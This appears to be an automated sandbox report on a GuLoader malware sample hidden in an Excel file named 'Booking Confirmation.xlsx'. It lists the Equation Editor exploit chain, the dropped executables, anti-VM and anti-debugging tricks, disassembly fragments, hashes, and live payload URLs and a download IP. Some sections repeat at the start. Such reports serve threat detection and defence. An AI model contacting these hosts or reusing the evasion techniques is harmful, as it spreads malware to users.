Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C9321 mov eax, dword ptr fs:[00000030h]	4_2_003C9321
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C479E mov eax, dword ptr fs:[00000030h]	4_2_003C479E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2 mov eax, dword ptr fs:[00000030h]	4_2_003C37F2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C47D2 mov eax, dword ptr fs:[00000030h]	4_2_003C47D2

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: !Progman

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.155.82.236	unknown	unknown		134687	TWIDC-AS-APTWIDCLimitedHK	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://103.155.82.236/nrsdoc/svchost.exe	true	Avira URL Cloud: safe	unknown
https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1134908
Source: C:\Users\Public\vbc.exe	Avira: detection malicious, Label: HEUR/AGEN.1134908

Found malware configuration

Source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Virustotal: Detection: 28%			Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 28%			Perma Link

Multi AV Scanner detection for submitted file

Source: Booking Confirmation.xlsx

ReversingLabs: Detection: 26%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 70MB

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin

Downloads executable code via HTTP

Source: global traffic

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0F13A2C.emf

Jump to behavior

Source: global traffic

Source: F7B97C3D.emf.0.dr

String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E96 NtAllocateVirtualMemory,	4_2_003C6E96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7008 NtAllocateVirtualMemory,	4_2_003C7008
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E50 NtAllocateVirtualMemory,	4_2_003C6E50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7084 NtAllocateVirtualMemory,	4_2_003C7084
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6EE4 NtAllocateVirtualMemory,	4_2_003C6EE4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C711E NtAllocateVirtualMemory,	4_2_003C711E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6F73 NtAllocateVirtualMemory,	4_2_003C6F73

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004018A4	4_2_004018A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405732	4_2_00405732
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E96	4_2_003C6E96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CB831	4_2_003CB831
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7428	4_2_003C7428
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C482B	4_2_003C482B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3427	4_2_003C3427
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3827	4_2_003C3827
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2A1C	4_2_003C2A1C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C0A1E	4_2_003C0A1E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3C13	4_2_003C3C13
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C767F	4_2_003C767F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3C73	4_2_003C3C73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6A6F	4_2_003C6A6F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CAA61	4_2_003CAA61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2A5F	4_2_003C2A5F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E50	4_2_003C6E50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3A43	4_2_003C3A43
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C38A5	4_2_003C38A5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C48A3	4_2_003C48A3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6A9F	4_2_003C6A9F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C22F7	4_2_003C22F7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6EE4	4_2_003C6EE4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C76DF	4_2_003C76DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3AD7	4_2_003C3AD7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C48C5	4_2_003C48C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C333D	4_2_003C333D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4927	4_2_003C4927
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7507	4_2_003C7507
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C757B	4_2_003C757B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3B73	4_2_003C3B73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6F73	4_2_003C6F73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4D68	4_2_003C4D68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3947	4_2_003C3947
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C39B8	4_2_003C39B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C479E	4_2_003C479E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4D80	4_2_003C4D80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C75F7	4_2_003C75F7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2	4_2_003C37F2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C0BDB	4_2_003C0BDB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C47D2	4_2_003C47D2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C33CF	4_2_003C33CF

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Booking Confirmation.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: svchost[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/17@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF0B4.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Booking Confirmation.xlsx

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Booking Confirmation.xlsx

Static file information: File size 1286656 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Booking Confirmation.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Booking Confirmation.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004059CC pushfd ; iretd	4_2_004059D5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406199 push ss; ret	4_2_004062BA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00407E0A push ecx; iretd	4_2_00407E0C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004062BD push ss; ret	4_2_004062BA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402F0B push dword ptr [ebp-1Ch]; ret	4_2_0041B724
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409B16 push ecx; retf	4_2_00409B23
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1017 push 3966E195h; ret	4_2_003C1021
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2C7F push 8566E195h; ret	4_2_003C2C89
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1697 push 9EF9818Fh; ret	4_2_003C16A1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6D0B push 3966E195h; retf	4_2_003C6D15
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2DEF push F6C88495h; ret	4_2_003C2DF9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C05EB push 38BAFB8Fh; ret	4_2_003C05F5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1FE7 push F7BAE195h; ret	4_2_003C1FF1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1DC7 push 38BAE195h; ret	4_2_003C1DD1

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Booking Confirmation.xlsx

Stream path 'EncryptedPackage' entropy: 7.99982364057 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C42D3		4_2_003C42D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2		4_2_003C37F2

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA021 second address: 00000000003CA078 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 53673179h 0x00000007 sub eax, 2CF91FC3h 0x0000000c xor eax, 4DAF12BEh 0x00000011 sub eax, 6BC10307h 0x00000016 cpuid 0x00000018 jmp 00007F767C7D7CDEh 0x0000001a pushad 0x0000001b rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_003C3427 rdtsc

4_2_003C3427

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2316

Thread sleep time: -360000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_003C3427 rdtsc

4_2_003C3427

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C482B mov eax, dword ptr fs:[00000030h]	4_2_003C482B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CAA61 mov eax, dword ptr fs:[00000030h]	4_2_003CAA61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C68D1 mov eax, dword ptr fs:[00000030h]	4_2_003C68D1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C9CCF mov eax, dword ptr fs:[00000030h]	4_2_003C9CCF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C9321 mov eax, dword ptr fs:[00000030h]	4_2_003C9321
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C479E mov eax, dword ptr fs:[00000030h]	4_2_003C479E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2 mov eax, dword ptr fs:[00000030h]	4_2_003C37F2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C47D2 mov eax, dword ptr fs:[00000030h]	4_2_003C47D2

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp	Binary or memory string: !Progman

ID:	433966
Product:	CloudBasic
Start time:	08:52:50
Start date:	14.06.2021
Sample:	Booking Confirmation.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	0ff57b2fd3fb489d3cca1e3de4fc98ea
SHA1:	48f428a33c81e6647c399a50a71e5ee03c1c2ef9
SHA256:	36e8b5e6839f88f144b51f690004f0464368d437d099fa74534fe1a6223a6ed2
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	EE83942376EA5717149517FCC832AB9F	EC75B10C6EF046CB63EAA20470AC94529FB4873A	B3498937A71913D7101FAFB04EB48A791106BEC97E21839B2E1BE8BB55A3F5FC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B15974F.png	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced	8C29CF033A1357A8DE6BF1FC4D0B2354	85B228BBC80DC60D40F4D3473E10B742E7B9039E	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2376BB51.png	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced	8C29CF033A1357A8DE6BF1FC4D0B2354	85B228BBC80DC60D40F4D3473E10B742E7B9039E	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\539A36D9.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\60C1A490.png	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced	16925690E9B366EA60B610F517789AF1	9F3FE15AE44644F9ED8C2CA668B7020DF726426B	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DE09D1A.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0F13A2C.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	7D10A02D1CE6CBECF621A557AC6242DF	42E4CE1D7D07F9956CD22417969C8B62534C97BC	11F1CDF0935334F53514E4B8CA4E096BBF56505458DD8FAC77EBEE917DF7BF13
